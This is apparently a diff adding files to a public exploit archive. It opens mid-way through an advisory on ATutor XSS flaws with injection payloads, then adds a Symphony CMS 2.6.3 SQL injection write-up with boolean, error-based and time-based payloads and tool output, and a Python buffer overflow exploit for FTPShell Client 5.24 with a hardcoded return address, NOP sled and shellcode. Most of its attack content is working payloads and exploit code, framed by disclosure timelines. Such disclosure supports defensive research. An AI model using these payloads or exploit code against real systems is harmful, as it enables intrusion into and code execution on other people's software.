successful exploitation can lead to code execution via the theme uploader, and
|
||||||
|
if the victim is an instructor, this can lead to code execution via a file
|
||||||
|
upload vulnerability in the same version of Atutor.
|
||||||
|
|
||||||
|
3. Details
|
||||||
|
|
||||||
|
XSS 1: Reflected XSS - Calendar
|
||||||
|
|
||||||
|
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
|
||||||
|
|
||||||
|
Description: The calendar_next parameter of the calendar is vulnerable to XSS.
|
||||||
|
This issue has been fixed in ATutor 2.2.1-RC1.
|
||||||
|
|
||||||
|
Proof of Concept:
|
||||||
|
|
||||||
|
http://localhost/ATutor/mods/_standard/calendar/getlanguage.php?token=calendar_next<script>alert(1)<%2fscript>&pub=1
|
||||||
|
|
||||||
|
Code:
|
||||||
|
|
||||||
|
/mods/_standard/calendar/getlanguage.php
|
||||||
|
$token = $_GET['token'];
|
||||||
|
echo _AT($token);
|
||||||
|
|
||||||
|
XSS 2: Persistent XSS - Profile
|
||||||
|
|
||||||
|
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
|
||||||
|
|
||||||
|
Description: When saving profile information, < is filtered out. < on the
|
||||||
|
other hand is not filtered, but converted to <, which leads to persistent XSS.
|
||||||
|
|
||||||
|
A user account is needed, but registration is open by default. This issue has
|
||||||
|
been fixed in ATutor 2.2.1.
|
||||||
|
|
||||||
|
Proof of Concept:
|
||||||
|
|
||||||
|
Visit:
|
||||||
|
http://localhost/ATutor/users/profile.php
|
||||||
|
In any field, enter
|
||||||
|
<img src=no onerror=alert(1)>
|
||||||
|
|
||||||
|
The input is for example echoed when visiting http://localhost/ATutor/users/
|
||||||
|
profile.php. This self-XSS may be exploited by force-logging in the victim.
|
||||||
|
|
||||||
|
The input is not only echoed to the user themselves, but also in other places.
|
||||||
|
|
||||||
|
For example, an attacker could send a private message to a victim. When the
|
||||||
|
victim views the message, or visits their inbox, the injected code will be
|
||||||
|
executed.
|
||||||
|
|
||||||
|
XSS 3: Persistent XSS - Forum
|
||||||
|
|
||||||
|
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
|
||||||
|
|
||||||
|
Description: When creating a forum post, the Subject parameter is vulnerable to
|
||||||
|
persistent XSS.
|
||||||
|
|
||||||
|
A user account is needed, but registration is open by default. This issue has
|
||||||
|
been fixed in ATutor 2.2.1.
|
||||||
|
|
||||||
|
Proof of Concept:
|
||||||
|
|
||||||
|
Visit a forum, eg here:
|
||||||
|
http://localhost/ATutor/mods/_standard/forums/forum/view.php?fid=1&pid=1
|
||||||
|
Post a new message, as Subject, use:
|
||||||
|
Re: test topic'"><img src=no onerror=alert(1)>
|
||||||
|
|
||||||
|
In ATutor 2.2.1-RC1, < and > are encoded, preventing the proof of concept from
|
||||||
|
working. But until version 2.2.1, it was still possible to exploit this issue
|
||||||
|
either by using the JavaScript context the input is echoed into (onClick), or
|
||||||
|
by adding a new attribute:
|
||||||
|
|
||||||
|
adding new attributes:
|
||||||
|
Re: ';" onmouseover="alert(1); var foo='
|
||||||
|
staying inside the existing JavaScript context:
|
||||||
|
Re: test topic';alert(1);var foo='
|
||||||
|
|
||||||
|
XSS 4: Persistent self-XSS - Calendar
|
||||||
|
|
||||||
|
CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N
|
||||||
|
|
||||||
|
Description: The event name of the calendar is vulnerable to persistent XSS.
|
||||||
|
The calendar seems to be shown only to the user creating it, meaning the only
|
||||||
|
way to exploit this issue would be to force-login the victim.
|
||||||
|
|
||||||
|
A user account is needed, but registration is open by default. This issue has
|
||||||
|
been fixed in ATutor 2.2.1-RC1.
|
||||||
|
|
||||||
|
Proof of Concept:
|
||||||
|
|
||||||
|
Visit: http://localhost/ATutor/mods/_standard/calendar/index_mystart.php
|
||||||
|
Create event with name:
|
||||||
|
'"><img src=no onerror=alert(1)>
|
||||||
|
Visit event page: http://localhost/ATutor/mods/_standard/calendar/index_mystart.php
|
||||||
|
|
||||||
|
XSS 5: Persistent XSS - Chat
|
||||||
|
|
||||||
|
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
|
||||||
|
|
||||||
|
Description: When viewing the chat history, chat messages are not properly HTML
|
||||||
|
encoded, leading to persistent XSS.
|
||||||
|
|
||||||
|
A user account is needed, but registration is open by default. This issue has
|
||||||
|
been fixed in ATutor 2.2.1-RC1.
|
||||||
|
|
||||||
|
Proof of Concept:
|
||||||
|
|
||||||
|
1. Visit Chat:
|
||||||
|
http://localhost/ATutor/mods/_standard/chat/chat.php
|
||||||
|
2. Enter chat message:
|
||||||
|
'"><img src=no onerror=alert(1)>
|
||||||
|
3. Visit chat history of that user:
|
||||||
|
http://localhost/ATutor/mods/_standard/chat/filterHistory.php?filterChatID=[USERNAME]
|
||||||
|
|
||||||
|
4. Solution
|
||||||
|
|
||||||
|
To mitigate this issue please upgrade at least to version 2.2.1:
|
||||||
|
|
||||||
|
http://www.atutor.ca/atutor/download.php
|
||||||
|
|
||||||
|
Please note that a newer version might already be available.
|
||||||
|
|
||||||
|
5. Report Timeline
|
||||||
|
|
||||||
|
11/17/2015 Informed Vendor about Issue
|
||||||
|
11/21/2015 Vendor requests more time
|
||||||
|
01/06/2016 Vendor releases new release candidate with partial fix
|
||||||
|
01/30/2016 Vendor releases complete fix
|
||||||
|
02/01/2016 Disclosed to public
|
||||||
|
|
||||||
|
|
||||||
|
Blog Reference:
|
||||||
|
https://blog.curesec.com/article/blog/Atutor-22-XSS-149.html
|
||||||
|
|
||||||
|
--
|
||||||
|
blog: https://blog.curesec.com
|
||||||
|
tweet: https://twitter.com/curesec
|
||||||
|
|
||||||
|
Curesec GmbH
|
||||||
|
Curesec Research Team
|
||||||
|
Romain-Rolland-Str 14-24
|
||||||
|
13089 Berlin, Germany
|
131
platforms/php/webapps/39416.txt
Executable file
131
platforms/php/webapps/39416.txt
Executable file
|
@ -0,0 +1,131 @@
|
||||||
|
================================================================
|
||||||
|
Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities
|
||||||
|
================================================================
|
||||||
|
|
||||||
|
Information
|
||||||
|
================================================================
|
||||||
|
Vulnerability Type : Multiple SQL Injection Vulnerabilities
|
||||||
|
Vendor Homepage: http://www.getsymphony.com/
|
||||||
|
Vulnerable Version:Symphony CMS 2.6.3
|
||||||
|
Fixed Version :Symphony CMS 2.6.5
|
||||||
|
Severity: High
|
||||||
|
Author – Sachin Wagh (@tiger_tigerboy)
|
||||||
|
|
||||||
|
Description
|
||||||
|
================================================================
|
||||||
|
|
||||||
|
The vulnerability is located in the 'fields[username]','action[save]' and
|
||||||
|
'fields[email]' of the '/symphony/system/authors/new/' page.
|
||||||
|
|
||||||
|
Proof of Concept
|
||||||
|
================================================================
|
||||||
|
*1. fields[username] (POST)*
|
||||||
|
|
||||||
|
Parameter: fields[username] (POST)
|
||||||
|
Type: boolean-based blind
|
||||||
|
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
|
||||||
|
Payload:
|
||||||
|
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-6697'
|
||||||
|
OR 7462=7462#&fields[user_type]=author&fields[password]=sach
|
||||||
|
in&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
|
||||||
|
Author
|
||||||
|
|
||||||
|
Type: error-based
|
||||||
|
Title: MySQL OR error-based - WHERE or HAVING clause
|
||||||
|
Payload:
|
||||||
|
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-8105'
|
||||||
|
OR 1 GROUP BY CONCAT(0x71767a7871,(SELECT (CASE WHEN (1004=1
|
||||||
|
004) THEN 1 ELSE 0 END)),0x716b7a6271,FLOOR(RAND(0)*2)) HAVING
|
||||||
|
MIN(0)#&fields[user_type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_a
|
||||||
|
rea]=3&action[save]=Create Author
|
||||||
|
|
||||||
|
Type: AND/OR time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 OR time-based blind (comment)
|
||||||
|
Payload:
|
||||||
|
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=sachin123'
|
||||||
|
OR SLEEP(5)#&fields[user_type]=author&fields[password]=s
|
||||||
|
achin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
|
||||||
|
Author
|
||||||
|
---
|
||||||
|
[14:09:41] [INFO] the back-end DBMS is MySQL
|
||||||
|
web server operating system: Windows
|
||||||
|
web application technology: Apache 2.4.12, PHP 5.5.27
|
||||||
|
back-end DBMS: MySQL 5.0.12
|
||||||
|
|
||||||
|
*2. fields[email] (POST)*
|
||||||
|
|
||||||
|
Parameter: fields[email] (POST)
|
||||||
|
Type: boolean-based blind
|
||||||
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||||
|
Payload:
|
||||||
|
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
|
||||||
|
sachin12@mail.com' AND 4852=4852 AND
|
||||||
|
'dqXl'='dqXl&fields[username]=sachinnn123&fields[user
|
||||||
|
type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
|
||||||
|
Author
|
||||||
|
|
||||||
|
Type: error-based
|
||||||
|
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
|
||||||
|
BY clause
|
||||||
|
Payload:
|
||||||
|
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
|
||||||
|
sachin12@mail.com' AND (SELECT 8298 FROM(SELECT
|
||||||
|
COUNT(*),CONCAT(0x71767a7871,(SELECT (ELT(
|
||||||
|
298=8298,1))),0x716b7a6271,FLOOR(RAND(0)*2))x FROM
|
||||||
|
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
|
||||||
|
'Pmvq'='Pmvq&fields[username]=sachinnn123&fields[user_type]=author&fields[password]=sachin&fields[
|
||||||
|
assword-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
|
||||||
|
Author
|
||||||
|
|
||||||
|
Type: AND/OR time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
|
||||||
|
Payload:
|
||||||
|
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
|
||||||
|
sachin12@mail.com' AND (SELECT * FROM (SELECT(SLEEP(5)))xIxY) AND
|
||||||
|
'hKvH'='hKvH&fields[user
|
||||||
|
ame]=sachinnn123&fields[user_type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
|
||||||
|
Author
|
||||||
|
|
||||||
|
*3. action[save] (POST)*
|
||||||
|
|
||||||
|
Parameter: action[save] (POST)
|
||||||
|
Type: boolean-based blind
|
||||||
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||||
|
Payload:
|
||||||
|
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
|
||||||
|
sachin12@mail.com
|
||||||
|
&fields[username]=sachinnn123&fields[user_type]=author&fields[password]=sa
|
||||||
|
chin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
|
||||||
|
Author%' AND 8836=8836 AND '%'='
|
||||||
|
|
||||||
|
---
|
||||||
|
[12:23:44] [INFO] the back-end DBMS is MySQL
|
||||||
|
web server operating system: Windows
|
||||||
|
web application technology: Apache 2.4.12, PHP 5.5.27
|
||||||
|
back-end DBMS: MySQL 5.0
|
||||||
|
================================================================
|
||||||
|
Vulnerable Product:
|
||||||
|
[+]
|
||||||
|
Symphony CMS 2.6.3
|
||||||
|
|
||||||
|
Vulnerable Parameter(s):
|
||||||
|
|
||||||
|
[+]fields[username] (POST)
|
||||||
|
[+]fields[email] (POST)
|
||||||
|
[+]action[save] (POST)
|
||||||
|
|
||||||
|
Affected Area(s):
|
||||||
|
[+]
|
||||||
|
http://localhost/symphony2.6.3/symphony-2.6.3/symphony/system/authors/new/
|
||||||
|
|
||||||
|
================================================================
|
||||||
|
Disclosure Timeline:
|
||||||
|
|
||||||
|
Vendor notification: Jan 29, 2016
|
||||||
|
Public disclosure: Jan 30, 2016
|
||||||
|
Credits & Authors
|
||||||
|
================================================================
|
||||||
|
Sachin Wagh (@tiger_tigerboy)
|
||||||
|
|
||||||
|
|
||||||
|
-- Best Regards, *Sachin Wagh*
|
44
platforms/windows/local/39417.py
Executable file
44
platforms/windows/local/39417.py
Executable file
|
@ -0,0 +1,44 @@
|
||||||
|
#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
|
||||||
|
#[+] Exploit Title: FTPShell Client (Add New Folder) Local Buffer Overflow
|
||||||
|
#[+] Date: 2/2/2016
|
||||||
|
#[+]Exploit Author: Arash Khazaei
|
||||||
|
#[+] Vendor Homepage: www.ftpshell.com
|
||||||
|
#[+]Software Link: http://www.ftpshell.com/download.htm
|
||||||
|
#[+] Version: 5.24
|
||||||
|
#[+] Tested on: Windows XP Professional SP3 (Version 2002)
|
||||||
|
#[+] CVE : N/A
|
||||||
|
#[+] introduction : Add New Folder In Remote FTP Server And In Name Input Copy Buffer.txt File content
|
||||||
|
#[+] or click on Remote Tab Then Click On Create Folder And Copy Buffer.txt In Name Input ...
|
||||||
|
#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
filename = "buffer.txt"
|
||||||
|
# Junk A
|
||||||
|
junk = "A"*452
|
||||||
|
#77FAB277 JMP ESP
|
||||||
|
# Windows Xp Professional Version 2002 Service Pack 3
|
||||||
|
eip = "\x77\xB2\xFA\x77"
|
||||||
|
# Nops
|
||||||
|
nops = "\x90"*100
|
||||||
|
# Shellcode Calc.exe 16Byte
|
||||||
|
buf=("\x31\xC9"
|
||||||
|
"\x51"
|
||||||
|
"\x68\x63\x61\x6C\x63"
|
||||||
|
"\x54"
|
||||||
|
"\xB8\xC7\x93\xC2\x77"
|
||||||
|
"\xFF\xD0")
|
||||||
|
|
||||||
|
#Appending Buffers Together
|
||||||
|
exploit = junk + eip + nops + buf
|
||||||
|
#Creating File
|
||||||
|
length = len(exploit)
|
||||||
|
print "[+]File name: [%s]\n" % filename
|
||||||
|
print "[+]Payload Size: [%s]\n " % length
|
||||||
|
print "[+]File Created.\n"
|
||||||
|
file = open(filename,"w")
|
||||||
|
file.write(exploit)
|
||||||
|
file.close
|
||||||
|
print exploit
|
||||||
|
|
||||||
|
|
||||||
|
#[+] Very Special Tnx To My Best Friends: TheNonexistent,Nirex,Pr0t3ctor
|
Loading…
Add table
Reference in a new issue